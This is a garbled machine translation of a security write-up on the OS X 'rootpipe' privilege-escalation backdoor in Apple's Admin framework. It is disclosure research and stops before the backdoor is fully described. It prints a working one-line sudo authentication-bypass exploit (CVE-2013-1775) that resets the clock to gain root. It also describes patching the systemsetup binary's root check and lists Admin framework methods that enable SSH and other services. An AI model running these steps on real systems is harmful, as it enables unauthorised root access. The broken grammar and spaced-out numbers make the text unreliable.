0x00 summary Apple OS X system Admin framework presence can elevate the root permissions of the API to the back door, and has been in existence for many years, at least from the 2 0 1 1 years. I was in 2 0 1 4 years 1 0 months to discover he can be used to have any user permissions elevated to root privileges, which intention may be to service the“System Preferences”and systemsetup（command-line tools, but all of the user processes can use the same function. Apple just released OS X 10.10.3 to solve this problem, but OS X 10.9. x and versions prior to this problem exists, because Apple decided not to these the version to be repaired. We recommend that all users upgrade to 1 0. 1 0. 3. the 0x01 demo I use the first exp is based on the CVE-2 0 1 3-1 7 7 5, a sudo authentication bypass bug, this bug has been in the 1 0. 8. 5 for 2 0 1 3 year 9 month repair. exp code is very simple: 1 $ sudo-k;systemsetup-setusingnetworktime Off-settimezone GMT-setdate 0 1:0 1:1 9 7 0-settime 0 0:0 0;sudo su I talked to my colleague Philip Åkesson talk the exp code to actually use the systemsetup to modify the system time. Together we watched him fix the details, it turned out in addition to fix sudo, Apple also did another thing, they put systemsetup set to require root privileges when a non-root permission to perform systemsetup time, the following information will be displayed in the 1 0. 8. 5 and after the version: a $ systemsetup You need administrator access to run this tool... exiting! This message is actually somewhat misleading, that we are actually in the running with administrator privileges, the installation of OS X when creating the user the default is admin permissions. In short, the above message indicates that the execution of the command requires root access, through the Hopper disassembly found the following code ! OK, so the systemsetup binary file is just a simple check out whether it is root access. Modified function with setne alternative to sete: the success of the $ systemsetup > systemsetup > type-help for help. So far, we just go back to before the systemsetup（10.8.5 before you can use the systemsetup command execution an example: $ systemsetup –setremotelogin on This will be in the 2 2 port on the ssh service, of course you can also launchtl open, but launchtl need root access. So this in the permissions, or there is a significant difference. Class name RemoteServerSettings show that there is some kind of inter-process communication can explain why you need a root operation is performed. But still want to mention that through System Preferences to open the SSH service also does not require root permissions. I found that the permissions of the differences very interesting, continue to decompile systemsetup it. By a name called[ServerSettings setRemoteLogin:]method to achieve the systemsetup in setremotelogin command. Function to do some input checking, and then call[InternetServices setSSHServerEnabled:], which is in the Admin framework. Decompile Admin framework can be seen setSSHServerEnabled is not InternetServices interface the only way, the list is as follows: +[InternetServices sharedInternetServices] +[InternetServices sharedInternetServices]. sSharedInternetServices -[InternetServices netFSServerFrameworkBundle] -[InternetServices _netFSServerFrameworkBundle]. sNetFSServerkBundle -[InternetServices _netFSServerFrameworkBundle]. sNetFSServerkBundleOnce -[InternetServices faxReceiveEnabled] -[InternetServices ftpServerEnabled] -[InternetServices httpdEnabled] -[InternetServices isFTPServerAvailable] -[InternetServices isFaxReceiveAvailable] -[InternetServices isGuestForProtocolEnabled:] -[InternetServices isHttpdAvailable] -[InternetServices isNSCProtocolAvailable:] -[InternetServices isNSCProtocolEnabled:] -[InternetServices isNSServerShuttingDown:] -[InternetServices isOpticalDiscSharingEnabled] -[InternetServices isRemoteAEServerAvailable] -[InternetServices isSSHServerAvailable] -[InternetServices nscServerCancelShutdown:refNum:] -[InternetServices nscServerShutdown:withDelay:] -[InternetServices numberOfClientsForProtocols:] -[InternetServices remoteAEServerEnabled] -[InternetServices saveNatPrefs:] -[InternetServices screensharingEnabled] -[InternetServices sendSIGHUPToEfax] -[InternetServices setFTPServerEnabled:] -[InternetServices setFaxReceiveEnabled:] -[InternetServices setGuestForProtocol:enabled:] -[InternetServices setHttpdEnabled:] -[InternetServices setInetDServiceEnabled:enabled:] -[InternetServices setNSCProtocols:enabled:] -[InternetServices setOpticalDiscSharingEnabled:] -[InternetServices setRemoteAEServerEnabled:] -[InternetServices setSSHServerEnabled:] -[InternetServices setScreensharingEnabled:] -[InternetServices sshServerEnabled] _OBJC_CLASS$InternetServices _OBJC_METACLASS$_InternetServices ___4 7-[InternetServices _netFSServerFrameworkBundle]_block_invoke Some, for example setHttpdEnabled and setSSHServerEnabled shared one of the auxiliary method[ADMInternetServices setInetDServiceEnabled:enabled:] in. Continue to look at the Admin framework code, and found: ! The code appears to be for the guest account to create a user-specific Apache configuration file, note that the root user is the file owner: $ ls-l /etc/apache2/users/ total 8 -rw-r--r-- 1 root wheel 1 3 9 Apr 1 0 5:4 9 std. conf 0x02 found the back door The above screenshot of the code in the last one to be calling Objective-C method is createFileWithContents:path:attributes: He gets a set of arrays comprises a number of bytes, file path, file properties.